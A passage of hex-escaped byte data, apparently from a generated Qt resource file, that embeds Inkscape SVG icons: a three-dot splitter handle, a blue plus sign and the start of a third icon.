\x74\x74\x65\x72\x5f\x68\x61\x6e\x64\x6c\x65\x5f\x68\x6f\x72\x69\
\x7a\x6f\x6e\x74\x61\x6c\x2e\x73\x76\x67\x22\x3e\x0a\x20\x20\x3c\
\x64\x65\x66\x73\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x64\x65\
\x66\x73\x32\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x73\x6f\x64\x69\x70\
\x6f\x64\x69\x3a\x6e\x61\x6d\x65\x64\x76\x69\x65\x77\x0a\x20\x20\
\x20\x20\x20\x69\x64\x3d\x22\x62\x61\x73\x65\x22\x0a\x20\x20\x20\
\x20\x20\x70\x61\x67\x65\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x66\x66\
\x66\x66\x66\x66\x22\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\x64\x65\
\x72\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x36\x36\x36\x36\x36\x36\x22\
\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\x64\x65\x72\x6f\x70\x61\x63\
\x69\x74\x79\x3d\x22\x31\x2e\x30\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\x6f\x70\x61\x63\
\x69\x74\x79\x3d\x22\x30\x2e\x30\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\x73\x68\x61\x64\
\x6f\x77\x3d\x22\x32\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x3a\x7a\x6f\x6f\x6d\x3d\x22\x31\x31\x2e\x32\x22\
\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\
\x78\x3d\x22\x32\x38\x2e\x36\x38\x32\x36\x33\x36\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x79\x3d\x22\
\x31\x33\x2e\x37\x30\x30\x31\x30\x37\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x64\x6f\x63\x75\x6d\x65\x6e\
\x74\x2d\x75\x6e\x69\x74\x73\x3d\x22\x6d\x6d\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x75\x72\x72\x65\
\x6e\x74\x2d\x6c\x61\x79\x65\x72\x3d\x22\x6c\x61\x79\x65\x72\x31\
\x22\x0a\x20\x20\x20\x20\x20\x73\x68\x6f\x77\x67\x72\x69\x64\x3d\
\x22\x66\x61\x6c\x73\x65\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x77\x69\x64\
\x74\x68\x3d\x22\x31\x39\x32\x30\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x68\
\x65\x69\x67\x68\x74\x3d\x22\x31\x31\x34\x31\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\
\x77\x2d\x78\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x79\x3d\x22\
\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x6d\x61\x78\x69\x6d\x69\x7a\x65\
\x64\x3d\x22\x31\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x6d\x65\x74\x61\
\x64\x61\x74\x61\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x6d\x65\
\x74\x61\x64\x61\x74\x61\x35\x22\x3e\x0a\x20\x20\x20\x20\x3c\x72\
\x64\x66\x3a\x52\x44\x46\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x63\
\x63\x3a\x57\x6f\x72\x6b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\
\x72\x64\x66\x3a\x61\x62\x6f\x75\x74\x3d\x22\x22\x3e\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\
\x3e\x69\x6d\x61\x67\x65\x2f\x73\x76\x67\x2b\x78\x6d\x6c\x3c\x2f\
\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x3c\x64\x63\x3a\x74\x79\x70\x65\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\x3a\x72\x65\x73\x6f\x75\
\x72\x63\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\
\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x64\x63\x6d\x69\x74\x79\x70\x65\
\x2f\x53\x74\x69\x6c\x6c\x49\x6d\x61\x67\x65\x22\x20\x2f\x3e\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\x74\x6c\
\x65\x3e\x3c\x2f\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\x0a\x20\x20\
\x20\x20\x20\x20\x3c\x2f\x63\x63\x3a\x57\x6f\x72\x6b\x3e\x0a\x20\
\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x52\x44\x46\x3e\x0a\x20\x20\
\x3c\x2f\x6d\x65\x74\x61\x64\x61\x74\x61\x3e\x0a\x20\x20\x3c\x67\
\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x6c\
\x61\x62\x65\x6c\x3d\x22\x45\x62\x65\x6e\x65\x20\x31\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\
\x75\x70\x6d\x6f\x64\x65\x3d\x22\x6c\x61\x79\x65\x72\x22\x0a\x20\
\x20\x20\x20\x20\x69\x64\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\
\x20\x20\x20\x20\x20\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x3d\x22\
\x74\x72\x61\x6e\x73\x6c\x61\x74\x65\x28\x30\x2c\x2d\x32\x38\x39\
\x29\x22\x3e\x0a\x20\x20\x20\x20\x3c\x63\x69\x72\x63\x6c\x65\x0a\
\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\
\x6c\x6c\x3a\x23\x30\x30\x30\x30\x30\x30\x3b\x66\x69\x6c\x6c\x2d\
\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\
\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\
\x74\x68\x3a\x30\x2e\x32\x35\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6d\
\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\x3a\x34\x3b\x73\x74\x72\x6f\
\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\x72\x61\x79\x3a\x6e\x6f\x6e\
\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\
\x3a\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x70\
\x61\x74\x68\x34\x34\x38\x37\x22\x0a\x20\x20\x20\x20\x20\x20\x20\
\x63\x78\x3d\x22\x32\x2e\x30\x31\x33\x35\x30\x34\x35\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x63\x79\x3d\x22\x32\x39\x33\x2e\x30\x38\
\x36\x34\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x72\x3d\x22\x31\
\x2e\x39\x31\x33\x35\x30\x34\x35\x22\x20\x2f\x3e\x0a\x20\x20\x20\
\x20\x3c\x63\x69\x72\x63\x6c\x65\x0a\x20\x20\x20\x20\x20\x20\x20\
\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x30\x30\x30\
\x30\x30\x30\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\
\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\x6f\x6e\x65\x3b\x73\
\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x30\x2e\x32\x35\
\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\
\x69\x74\x3a\x34\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\
\x61\x72\x72\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\
\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\x34\x34\x38\x37\
\x2d\x36\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x63\x78\x3d\x22\x37\
\x2e\x39\x31\x33\x35\x30\x34\x36\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x63\x79\x3d\x22\x32\x39\x33\x2e\x30\x38\x36\x34\x39\x22\x0a\
\x20\x20\x20\x20\x20\x20\x20\x72\x3d\x22\x31\x2e\x39\x31\x33\x35\
\x30\x34\x35\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x63\x69\x72\
\x63\x6c\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\
\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x30\x30\x30\x30\x30\x30\x3b\x66\
\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\
\x72\x6f\x6b\x65\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\
\x2d\x77\x69\x64\x74\x68\x3a\x30\x2e\x32\x35\x3b\x73\x74\x72\x6f\
\x6b\x65\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\x3a\x34\x3b\
\x73\x74\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\x72\x61\x79\
\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\
\x63\x69\x74\x79\x3a\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\
\x64\x3d\x22\x70\x61\x74\x68\x34\x34\x38\x37\x2d\x37\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x63\x78\x3d\x22\x31\x34\x2e\x30\x31\x33\
\x35\x30\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x63\x79\x3d\x22\
\x32\x39\x33\x2e\x30\x38\x36\x34\x39\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x72\x3d\x22\x31\x2e\x39\x31\x33\x35\x30\x34\x35\x22\x20\
\x2f\x3e\x0a\x20\x20\x3c\x2f\x67\x3e\x0a\x3c\x2f\x73\x76\x67\x3e\
\x0a\
\x00\x00\x0a\x38\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\x0a\
\x0a\x3c\x73\x76\x67\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\
\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\
\x2e\x31\x2f\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\
\x65\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\
\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\
\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\
\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\
\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\
\x73\x6f\x75\x72\x63\x65\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\
\x44\x54\x44\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\
\x74\x64\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x69\x6e\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\
\x61\x6d\x65\x73\x70\x61\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x22\x0a\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x33\x32\
\x70\x78\x22\x0a\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x33\
\x32\x70\x78\x22\x0a\x20\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\
\x22\x30\x20\x30\x20\x33\x32\x20\x33\x32\x22\x0a\x20\x20\x20\x76\
\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x31\x22\x0a\x20\x20\x20\
\x69\x64\x3d\x22\x53\x56\x47\x52\x6f\x6f\x74\x22\x0a\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\
\x3d\x22\x30\x2e\x39\x32\x2e\x31\x20\x72\x22\x0a\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\
\x22\x70\x6c\x75\x73\x2e\x73\x76\x67\x22\x3e\x0a\x20\x20\x3c\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x6e\x61\x6d\x65\x64\x76\x69\x65\
\x77\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x62\x61\x73\x65\x22\
\x0a\x20\x20\x20\x20\x20\x70\x61\x67\x65\x63\x6f\x6c\x6f\x72\x3d\
\x22\x23\x66\x66\x66\x66\x66\x66\x22\x0a\x20\x20\x20\x20\x20\x62\
\x6f\x72\x64\x65\x72\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x36\x36\x36\
\x36\x36\x36\x22\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\x64\x65\x72\
\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x31\x2e\x30\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\
\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x30\x2e\x30\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\
\x73\x68\x61\x64\x6f\x77\x3d\x22\x32\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x7a\x6f\x6f\x6d\x3d\x22\x31\
\x36\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x63\x78\x3d\x22\x32\x30\x2e\x33\x38\x34\x37\x34\x33\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x79\
\x3d\x22\x31\x37\x2e\x33\x39\x30\x36\x32\x35\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x64\x6f\x63\x75\x6d\
\x65\x6e\x74\x2d\x75\x6e\x69\x74\x73\x3d\x22\x70\x78\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x75\x72\
\x72\x65\x6e\x74\x2d\x6c\x61\x79\x65\x72\x3d\x22\x6c\x61\x79\x65\
\x72\x31\x22\x0a\x20\x20\x20\x20\x20\x73\x68\x6f\x77\x67\x72\x69\
\x64\x3d\x22\x66\x61\x6c\x73\x65\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x77\
\x69\x64\x74\x68\x3d\x22\x31\x39\x32\x30\x22\x0a\x20\x20\x20\x20\
\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\
\x2d\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x31\x34\x31\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\
\x64\x6f\x77\x2d\x78\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x79\
\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x6d\x61\x78\x69\x6d\x69\
\x7a\x65\x64\x3d\x22\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x67\x72\x69\x64\x2d\x62\x62\x6f\x78\x3d\
\x22\x74\x72\x75\x65\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x64\x65\x66\
\x73\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x64\x65\x66\x73\x34\
\x34\x38\x35\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x6d\x65\x74\x61\x64\
\x61\x74\x61\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x6d\x65\x74\
\x61\x64\x61\x74\x61\x34\x34\x38\x38\x22\x3e\x0a\x20\x20\x20\x20\
\x3c\x72\x64\x66\x3a\x52\x44\x46\x3e\x0a\x20\x20\x20\x20\x20\x20\
\x3c\x63\x63\x3a\x57\x6f\x72\x6b\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x72\x64\x66\x3a\x61\x62\x6f\x75\x74\x3d\x22\x22\x3e\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\
\x61\x74\x3e\x69\x6d\x61\x67\x65\x2f\x73\x76\x67\x2b\x78\x6d\x6c\
\x3c\x2f\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x79\x70\x65\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\x3a\x72\x65\x73\
\x6f\x75\x72\x63\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\
\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x64\x63\x6d\x69\x74\x79\
\x70\x65\x2f\x53\x74\x69\x6c\x6c\x49\x6d\x61\x67\x65\x22\x20\x2f\
\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\
\x74\x6c\x65\x20\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x63\
\x63\x3a\x57\x6f\x72\x6b\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x72\x64\
\x66\x3a\x52\x44\x46\x3e\x0a\x20\x20\x3c\x2f\x6d\x65\x74\x61\x64\
\x61\x74\x61\x3e\x0a\x20\x20\x3c\x67\x0a\x20\x20\x20\x20\x20\x69\
\x64\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\x70\x6d\x6f\
\x64\x65\x3d\x22\x6c\x61\x79\x65\x72\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\x62\x65\x6c\x3d\x22\
\x45\x62\x65\x6e\x65\x20\x31\x22\x3e\x0a\x20\x20\x20\x20\x3c\x74\
\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x3a\x73\
\x70\x61\x63\x65\x3d\x22\x70\x72\x65\x73\x65\x72\x76\x65\x22\x0a\
\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x6f\
\x6e\x74\x2d\x73\x74\x79\x6c\x65\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\
\x66\x6f\x6e\x74\x2d\x76\x61\x72\x69\x61\x6e\x74\x3a\x6e\x6f\x72\
\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x77\x65\x69\x67\x68\x74\x3a\
\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x73\x74\x72\x65\
\x74\x63\x68\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\
\x73\x69\x7a\x65\x3a\x38\x70\x78\x3b\x6c\x69\x6e\x65\x2d\x68\x65\
\x69\x67\x68\x74\x3a\x31\x2e\x32\x35\x3b\x66\x6f\x6e\x74\x2d\x66\
\x61\x6d\x69\x6c\x79\x3a\x27\x53\x6f\x75\x72\x63\x65\x20\x43\x6f\
\x64\x65\x20\x50\x72\x6f\x27\x3b\x2d\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x2d\x66\x6f\x6e\x74\x2d\x73\x70\x65\x63\x69\x66\x69\x63\x61\
\x74\x69\x6f\x6e\x3a\x27\x53\x6f\x75\x72\x63\x65\x20\x43\x6f\x64\
\x65\x20\x50\x72\x6f\x27\x3b\x6c\x65\x74\x74\x65\x72\x2d\x73\x70\
\x61\x63\x69\x6e\x67\x3a\x30\x70\x78\x3b\x77\x6f\x72\x64\x2d\x73\
\x70\x61\x63\x69\x6e\x67\x3a\x30\x70\x78\x3b\x66\x69\x6c\x6c\x3a\
\x23\x30\x30\x30\x30\x30\x30\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\
\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\x6f\
\x6e\x65\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x78\x3d\x22\x38\x2e\
\x33\x37\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x79\x3d\x22\x37\
\x2e\x38\x37\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x74\x65\x78\x74\x35\x30\x39\x31\x22\x3e\x3c\x74\x73\x70\x61\
\x6e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\
\x6f\x64\x69\x3a\x72\x6f\x6c\x65\x3d\x22\x6c\x69\x6e\x65\x22\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x74\x73\x70\
\x61\x6e\x35\x30\x38\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x78\x3d\x22\x38\x2e\x33\x37\x35\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x79\x3d\x22\x31\x34\x2e\x38\x37\x35\x22\x20\x2f\
\x3e\x3c\x2f\x74\x65\x78\x74\x3e\x0a\x20\x20\x20\x20\x3c\x67\x0a\
\x20\x20\x20\x20\x20\x20\x20\x61\x72\x69\x61\x2d\x6c\x61\x62\x65\
\x6c\x3d\x22\x2b\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\
\x6c\x65\x3d\x22\x66\x6f\x6e\x74\x2d\x73\x74\x79\x6c\x65\x3a\x6e\
\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x76\x61\x72\x69\x61\
\x6e\x74\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x77\
\x65\x69\x67\x68\x74\x3a\x39\x30\x30\x3b\x66\x6f\x6e\x74\x2d\x73\
\x74\x72\x65\x74\x63\x68\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\
\x6e\x74\x2d\x73\x69\x7a\x65\x3a\x35\x33\x2e\x33\x33\x33\x33\x33\
\x32\x30\x36\x70\x78\x3b\x6c\x69\x6e\x65\x2d\x68\x65\x69\x67\x68\
\x74\x3a\x31\x2e\x32\x35\x3b\x66\x6f\x6e\x74\x2d\x66\x61\x6d\x69\
\x6c\x79\x3a\x27\x53\x6f\x75\x72\x63\x65\x20\x43\x6f\x64\x65\x20\
\x50\x72\x6f\x27\x3b\x2d\x69\x6e\x6b\x73\x63\x61\x70\x65\x2d\x66\
\x6f\x6e\x74\x2d\x73\x70\x65\x63\x69\x66\x69\x63\x61\x74\x69\x6f\
\x6e\x3a\x27\x53\x6f\x75\x72\x63\x65\x20\x43\x6f\x64\x65\x20\x50\
\x72\x6f\x20\x48\x65\x61\x76\x79\x27\x3b\x6c\x65\x74\x74\x65\x72\
\x2d\x73\x70\x61\x63\x69\x6e\x67\x3a\x30\x70\x78\x3b\x77\x6f\x72\
\x64\x2d\x73\x70\x61\x63\x69\x6e\x67\x3a\x30\x70\x78\x3b\x66\x69\
\x6c\x6c\x3a\x23\x30\x30\x35\x35\x64\x34\x3b\x66\x69\x6c\x6c\x2d\
\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\
\x3a\x6e\x6f\x6e\x65\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\
\x3d\x22\x74\x65\x78\x74\x35\x37\x30\x37\x22\x3e\x0a\x20\x20\x20\
\x20\x20\x20\x3c\x70\x61\x74\x68\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x64\x3d\x22\x6d\x20\x31\x32\x2e\x37\x35\x35\x38\x33\x33\
\x2c\x32\x38\x2e\x38\x38\x37\x35\x20\x68\x20\x36\x2e\x36\x31\x33\
\x33\x33\x33\x20\x76\x20\x2d\x39\x2e\x36\x20\x68\x20\x39\x2e\x32\
\x38\x20\x76\x20\x2d\x36\x2e\x34\x20\x68\x20\x2d\x39\x2e\x32\x38\
\x20\x56\x20\x33\x2e\x32\x38\x37\x35\x30\x30\x37\x20\x48\x20\x31\
\x32\x2e\x37\x35\x35\x38\x33\x33\x20\x56\x20\x31\x32\x2e\x38\x38\
\x37\x35\x20\x48\x20\x33\x2e\x34\x37\x35\x38\x33\x33\x33\x20\x76\
\x20\x36\x2e\x34\x20\x68\x20\x39\x2e\x32\x37\x39\x39\x39\x39\x37\
\x20\x7a\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\
\x6c\x65\x3d\x22\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\
\x64\x3d\x22\x70\x61\x74\x68\x35\x37\x30\x39\x22\x20\x2f\x3e\x0a\
\x20\x20\x20\x20\x3c\x2f\x67\x3e\x0a\x20\x20\x3c\x2f\x67\x3e\x0a\
\x3c\x2f\x73\x76\x67\x3e\x0a\
\x00\x00\x09\x03\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
